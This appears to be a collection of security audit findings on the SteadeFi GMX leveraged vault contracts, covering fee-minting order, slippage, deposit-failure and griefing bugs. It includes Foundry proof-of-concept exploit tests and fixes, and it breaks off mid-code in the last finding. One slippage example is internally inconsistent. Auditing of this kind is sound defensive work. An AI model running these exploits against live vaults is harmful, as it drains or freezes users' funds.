```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n
Users withdraw more assets than should when `mintFee` was called long ago
high
The amount of LP tokens to withdraw is calculated in `GMXWithdraw.withdraw` before the `mintFee` function is called. The `mintFee` function increases the `totalSupply` amount. This way users receive more tokens than they should at the current timestamp. The longer the period since the last `mintFee` call, the more excess tokens the user receives.\\nThe protocol mints vault token shares as management fees to the protocol treasury with the `mintFee` function. This increases the `totalSupply` of the shares. The amount of minted fees depends on the time since the last `mintFee` call.\\n```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nMeanwhile, the withdrawal amount of LP tokens can be calculated with an outdated totalSupply:\\n```\\n67 _wc.shareRatio = wp.shareAmt\\n68 * SAFE_MULTIPLIER\\n69 / IERC20(address(self.vault)).totalSupply();\\n70 _wc.lpAmt = _wc.shareRatio\\n71 * GMXReader.lpAmt(self)\\n72 / SAFE_MULTIPLIER;\\n\\n101 self.vault.mintFee();\\n```\\n\\nThe `mintFee` is called only after this calculation.
Users withdraw more assets than should when `mintFee` was called long ago\\nConsider calling the `mintFee` before the `_wc.shareRatio` calculation.
Users can receive excess amounts of tokens during withdrawal. Other users and the protocol management lose value of their shares.
```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n
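A minimal sketch of the reordering in `GMXWithdraw.withdraw` (following the report's excerpt): settle pending fees first so `totalSupply` is up to date when `shareRatio` is computed.\\n```\\n// Mint pending management fees before any share math\\nself.vault.mintFee();\\n\\n_wc.shareRatio = wp.shareAmt\\n * SAFE_MULTIPLIER\\n / IERC20(address(self.vault)).totalSupply();\\n_wc.lpAmt = _wc.shareRatio\\n * GMXReader.lpAmt(self)\\n / SAFE_MULTIPLIER;\\n```\\n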
Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification
medium
The protocol charges a management fee based on the `feePerSecond` variable, which dictates the rate at which new vault tokens are minted as fees via the `mintFee` function. An administrative function `updateFeePerSecond` allows the owner to alter this fee rate. However, the current implementation does not account for accrued fees before the update, potentially leading to incorrect fee calculation.\\nThe contract's logic fails to account for outstanding fees at the old rate prior to updating the `feePerSecond`. As it stands, the `updateFeePerSecond` function changes the fee rate without triggering a `mintFee`, which would update the `lastFeeCollected` timestamp and mint the correct amount of fees owed up until that point.\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n\\nScenario Illustration:\\nUser A deposits, triggering `mintFee` and setting `lastFeeCollected` to the current `block.timestamp`.\\nAfter two hours without transactions, no additional `mintFee` calls occur.\\nThe owner invokes `updateFeePerSecond` to increase the fee by 10%.\\nUser B deposits, and `mintFee` now calculates fees since `lastFeeCollected` using the new, higher rate, incorrectly applying it to the period before the rate change.
Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification\\nEnsure the fees are accurately accounted for at their respective rates by updating `lastFeeCollected` to the current timestamp prior to altering the `feePerSecond`. This can be achieved by invoking `mintFee` within the `updateFeePerSecond` function to settle all pending fees first:\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n mintFee(); // settles pending fees at the old rate and updates lastFeeCollected\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n
The impact is twofold:\\nAn increased `feePerSecond` results in excessively high fees charged for the period before the update.\\nA decreased `feePerSecond` leads to lower-than-expected fees for the same duration.
```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n
Token injection leads to unintended behavior of vault
medium
When a token is deposited/withdrawn in a vault, it happens in two steps. In the first step, some states of the vault are saved, which are partially important for the second step, and a request to deposit/withdraw is made to GMX. In the second step, GMX calls the callback function, and the vault completes the deposit/withdrawal. The problem is that one can send LP tokens to the contract between these two steps, causing the vault to behave unintentionally.\\nDeposit\\nHere is a PoC for the effects when sending lpTokens between the two steps during deposit:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. 
\\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log("debtAmtTokenBBefore: %s", debtAmtTokenBBefore);\\n console.log("debtAmtTokenBAfter: %s", debtAmtTokenBAfter);\\n }\\n}\\n```\\n\\nSince the user can withdraw their injected tokens, which they received VaultShares for, they could execute this action multiple times to further worsen the tokenB debt amount and, consequently, the leverage.\\nThe POC can be started with this command: `forge test --match-test test_POC2 -vv`\\nWithdraw\\nWhen withdrawing, LP tokens can also be injected between the two steps. This can be exploited by an attacker because he can fail the afterWithdrawChecks if he sends the same amount of lp tokens that a user wants to withdraw.\\nHere is the check that the attacker could exploit by sending enough tokens to make the lpAmt as large as it was before the withdrawal:\\n```\\nFile: GMXChecks.sol#afterWithdrawChecks\\nif (GMXReader.lpAmt(self) >= self.withdrawCache.healthParams.lpAmtBefore)\\n revert Errors.InsufficientLPTokensBurned();\\n```\\n
In the deposit function, the depositValue should be used to estimate approximately how many lpTokens GMX will transfer to the vault. This number should then be compared to the actually received amount in processDeposit.\\nIn the case of withdrawal, after calling removeLiquidity, the lpAmt should be stored, and this should be compared to the lpAmt in the processWithdraw function to determine whether tokens were injected.
If this bug is exploited during deposit, an attacker can decrease the leverage, leaving vault users with less leverage and lower yield.\\nWhen withdrawing, the attacker can potentially cause the withdrawal to fail, but the user doesn't lose anything and can try again.
```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log("debtAmtTokenBBefore: %s", debtAmtTokenBBefore);\\n console.log("debtAmtTokenBAfter: %s", debtAmtTokenBAfter);\\n }\\n}\\n```\\n
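A minimal sketch of the deposit-side check; the `expectedLpAmt` cache field, the LP price input, the tolerance constant, and the error name are all assumptions:\\n```\\n// In deposit(): cache an estimate of the LP tokens GMX should mint\\n// (_dc.depositValue and an LP token USD price are assumed available)\\nself.depositCache.expectedLpAmt = _dc.depositValue\\n * SAFE_MULTIPLIER\\n / _lpTokenPrice; // hypothetical USD price per LP token\\n\\n// In processDeposit(): reject injected tokens that inflate the received amount\\nuint256 _lpAmtReceived = GMXReader.lpAmt(self)\\n - self.depositCache.healthParams.lpAmtBefore;\\n\\nif (_lpAmtReceived > self.depositCache.expectedLpAmt * (10_000 + TOLERANCE_BPS) / 10_000)\\n revert Errors.ExcessLpTokensReceived(); // hypothetical error\\n```\\n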
User can revert processWithdraw
high
When a user wants to withdraw his tokens after depositing, the LP tokens are first sent to GMX. GMX then sends back the deposited tokens. Before the user receives them, their Vault Shares are burned in processWithdraw:\\n```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nA user could, after the LP tokens have been transferred to GMX while the Vault is waiting for the callback, transfer his Vault Shares away from his address. This would leave too few tokens at his address during the burn, causing a revert. Afterward, the Vault would be stuck in the 'Withdraw' state: although the keeper could call the function again, it would simply revert again.\\nHere is a POC that demonstrates how a user can cause the processWithdraw to revert:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { IERC20Errors } from "@openzeppelin/contracts/interfaces/draft-IERC6093.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\nimport { Attacker } from "./Attacker.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC4() public {\\n //owner deposits\\n vm.startPrank(address(owner));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //user1 deposits\\n vm.startPrank(address(user1));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n \\n uint256 vaultSharesAmt = IERC20(address(vault)).balanceOf(address(user1)); //Vault Shares from user1 to withdraw\\n vm.startPrank(address(user1));\\n _createWithdrawal(address(USDC), vaultSharesAmt, 0, SLIPPAGE, EXECUTION_FEE); //User 1 creates a withdrawal\\n IERC20(address(vault)).transfer(address(user2), vaultSharesAmt); //Before processWithdraw is executed and the user's Vault Shares are burned, he sends them away\\n\\n vm.expectRevert(\\n abi.encodeWithSelector(IERC20Errors.ERC20InsufficientBalance.selector, address(user1), 0, vaultSharesAmt)\\n );\\n mockExchangeRouter.executeWithdrawal(address(WETH), address(USDC), address(vault), address(callback)); //executeWithdraw reverted as there are no tokens to burn\\n vm.stopPrank();\\n\\n GMXTypes.Store memory _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw)); //shows that the vault is still in the Withdraw status\\n }\\n}\\n```\\n\\nThe POC can be started with this command: `forge test --match-test test_POC4 -vv`
Tokens should be burned immediately after removeLiquidity is called in GMXWithdraw.sol:\\n```diff\\n+ 154: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n- 197: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n
A user could put the Vault into a 'Stuck' state that can only be exited through 'emergencyPause' and 'emergencyResume.' This would take some time as 'emergencyResume' can only be called by the owner, who is a Multisig with a Timelock. (A keeper could also call 'processWithdrawCancellation,' but in this case, the debt to the lending vault would not be repaid. The tokens withdrawn by GMX would simply remain in the vault, and the user's Vault Shares would not be burned.)
```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n
Incorrect slippage protection on deposits
high
The slippage on deposits is enforced by the `minMarketTokenAmt` parameter. But in the calculation of `minMarketTokenAmt`, the slippage is applied to the user's deposit value and not to the leveraged amount which is actually being deposited to GMX.\\n```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXDeposit.sol#L54-L146\\nBut vaults with leverage greater than 1 will be adding more than `_dc.depositValue` worth of liquidity, in which case the calculated `minMarketTokenAmt` allows a much higher slippage.\\nExample Scenario\\nThe vault is a 3x leveraged vault\\nUser deposits 1 usd worth of tokenA and sets slippage to 1%.\\nThe `minMarketTokenAmt` calculated is worth 0.99 usd\\nThe actual deposit added is worth 3 usd due to leverage\\nThe deposit could receive as little as 2.90 usd worth of LP tokens, a ~3.3% slippage, and still pass the check, since anything above 0.99 usd is accepted
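To quantify the mismatch (a worked derivation based on the scenario above, not code from the repository): because `minMarketTokenAmt` is based on the unleveraged deposit value while the leveraged value is what gets added, the effectively tolerated slippage grows with leverage:\\n```\\nminMarketTokenAmt = v * (1 - s) // based on user deposit value v and slippage s\\nactual value added = l * v // leverage l\\neffective max slippage = 1 - (v * (1 - s)) / (l * v) = 1 - (1 - s) / l\\ne.g. l = 3, s = 1%: 1 - 0.99 / 3 = 67%\\n```\\n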
Use the actual deposit value instead of the user's initial deposit value when calculating the `minMarketTokenAmt`\\n```diff\\ndiff --git a/contracts/strategy/gmx/GMXDeposit.sol b/contracts/strategy/gmx/GMXDeposit.sol\\nindex 1b28c3b..aeba68b 100644\\n--- a/contracts/strategy/gmx/GMXDeposit.sol\\n+++ b/contracts/strategy/gmx/GMXDeposit.sol\\n@@ -135,7 +135,15 @@ library GMXDeposit {\\n     _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n     _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n       self,\\n-      _dc.depositValue,\\n+      GMXReader.convertToUsdValue(\\n+        self,\\n+        address(self.tokenA),\\n+        _alp.tokenAAmt\\n+      ) +\\n+      GMXReader.convertToUsdValue(\\n+        self,\\n+        address(self.tokenB),\\n+        _alp.tokenBAmt\\n+      ),\\n       dp.slippage\\n     );\\n     _alp.executionFee = dp.executionFee;\\n```\\n
Depositors can lose value
```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n
Incorrect handling of deposit failure leaves the vault stuck in the `deposit_failed` status
medium
When a deposit fails, the contract can become stuck in a `deposit_failed` status due to improper handling of debt repayment by swapping through the `swapTokensForExactTokens()` function, which leads to gas losses for keepers attempting to handle the failure and puts user deposits at risk.\\nWhen a user makes a deposit to the `strategy`, it creates a deposit in `GMX`. After a successful deposit, `GMX` calls the callback function `afterDepositExecution`, and the callback function calls `processDeposit`.\\nIf `processDeposit()` fails in the `try` call for any reason, the function will `catch` that and set the status to `deposit_failed`. An event is emitted so the keeper can handle it.\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n\\nThe keeper calls the function processDepositFailure(). This function initiates a `requestWithdraw` to `GMX` to remove the liquidity added by the user deposit (+ the borrowed amount).\\nAfter executing the `removeLiquidity`, the callback function `afterWithdrawalExecution` is triggered, and since the status is `deposit_failed`, it invokes the function `processDepositFailureLiquidityWithdrawal`.\\nIn `processDepositFailureLiquidityWithdrawal`, it first checks if a swap is necessary. If required, it swaps tokens to repay the debt.\\n```\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = block.timestamp;\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n```\\n\\nThe problem arises when the swap reverts because the `tokenIn` balance is insufficient to cover the `_amountOut` of `_tokenOut`; since the swap function is `swapTokensForExactTokens`, the whole swap fails. Consequently, the status remains `deposit_failed` and the callback reverts.\\nNote: The swap can fail for various reasons.\\nIn this scenario, the keeper can only invoke the `processDepositFailure()` function again. During the second call, it directly triggers `processDepositFailureLiquidityWithdrawal` since the `lp` tokens for the failed deposit have already been withdrawn.\\n```\\n function processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current gmx LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n //// rest of code more code\\n }}\\n```\\n\\nThe swap will always revert because the contract's balance of `tokenIn` will never be sufficient to cover the `_amountOut` of `_tokenOut`. Consequently, the status remains stuck at `deposit_failed`.
Utilize `swapExactTokensForTokens` and swap the remaining `tokenIn` balance (after subtracting the debt that must be repaid in that token) for `tokenOut`.\\nImplement safeguards that calculate an appropriate swap amount, avoiding transactions that are bound to revert. Here's an example of how the swap amount could be calculated:\\n```\\nif (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n if (rp.repayTokenBAmt < self.tokenB.balanceOf(address(this))) {\\n _tokenToAmt = self.tokenB.balanceOf(address(this)) - rp.repayTokenBAmt;\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n }\\n}\\n```\\n
The strategy remains stuck at the `deposit_failed` status, halting any further interactions with the protocol.\\nKeepers lose gas for each call to `processDepositFailure()`.\\nUsers may lose their deposits.
```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n
Missing fees allow cheap griefing attacks that lead to DoS
medium
The protocol has chosen a design pattern which does not allow two users to interact with the system at the same time: every time a user deposits or withdraws funds, a 2-step process begins which interacts with GMX, and only after this process is closed is another user allowed to start a new process. This design pattern can be abused as a griefing attack by front-running all user calls with a small deposit or withdraw call to DoS the user's call. As the protocol is deployed on L2 blockchains with low transaction fees and does not take fees on depositing or withdrawing funds, this DoS griefing attack is cheap and can be scaled to a point where nobody is able to interact with the system.\\nThe design pattern of the system which leads to this possibility is the status variable.\\nThe flow for such a griefing attack would look like the following:\\nThe system's status is Open\\nUser wants to deposit or withdraw and creates a transaction to do so\\nAttacker front-runs the user's call and deposits or withdraws a small amount of funds (the system's status changes to Deposit or Withdraw)\\nUser's call gets reverted as the check that the system's status is Open reverts\\nDeposit function calls beforeDepositChecks and updates the status to Deposit:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n\\nThe beforeDepositChecks function reverts if the current status is not Open:\\n```\\nfunction beforeDepositChecks(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n) external view {\\n if (self.status != GMXTypes.Status.Open)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nThe same pattern is implemented in the withdraw flow.
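A minimal Foundry sketch of the griefing sequence, reusing helpers from the repository's own POCs above (`GMXMockVaultSetup`, `GMXTestHelper`, `_createDeposit`); the `Errors` import path is an assumption:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\nimport { Errors } from "../../../contracts/utils/Errors.sol"; // assumed path\\n\\ncontract GMXGriefingTest is GMXMockVaultSetup, GMXTestHelper {\\n function test_POC_statusGriefing() public {\\n // Attacker front-runs with a dust deposit; vault status flips Open -> Deposit\\n vm.startPrank(user2);\\n _createDeposit(address(WETH), 0.0001 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n // Victim's deposit now reverts in beforeDepositChecks because status != Open\\n vm.startPrank(user1);\\n vm.expectRevert(Errors.NotAllowedInCurrentVaultStatus.selector);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n }\\n}\\n```\\n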
Implement fees, for depositing and withdrawing, to increase the costs of such a griefing attack, or rethink the status architecture.
DoS of the whole system for all depositors.
```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n
Yield in trove is lost when closing a strategy vault
high
The funds in the trove contract are not claimed during the emergency close flow and cannot be claimed the normal way in this situation because of the status change. Therefore, all the acquired yield will be lost.\\nWhen users deposit or withdraw tokens, all acquired yield from GMX is sent to the trove contract:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\n```\\nfunction withdraw(\\n GMXTypes.Store storage self,\\n GMXTypes.WithdrawParams memory wp\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of withdrawers assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\nThe only way in the system to claim this yield is the compound function, which calls the beforeCompoundChecks function:\\n```\\nfunction compound(\\n GMXTypes.Store storage self,\\n GMXTypes.CompoundParams memory cp\\n) external {\\n // Transfer any tokenA/B from trove to vault\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenA.balanceOf(address(self.trove))\\n );\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n 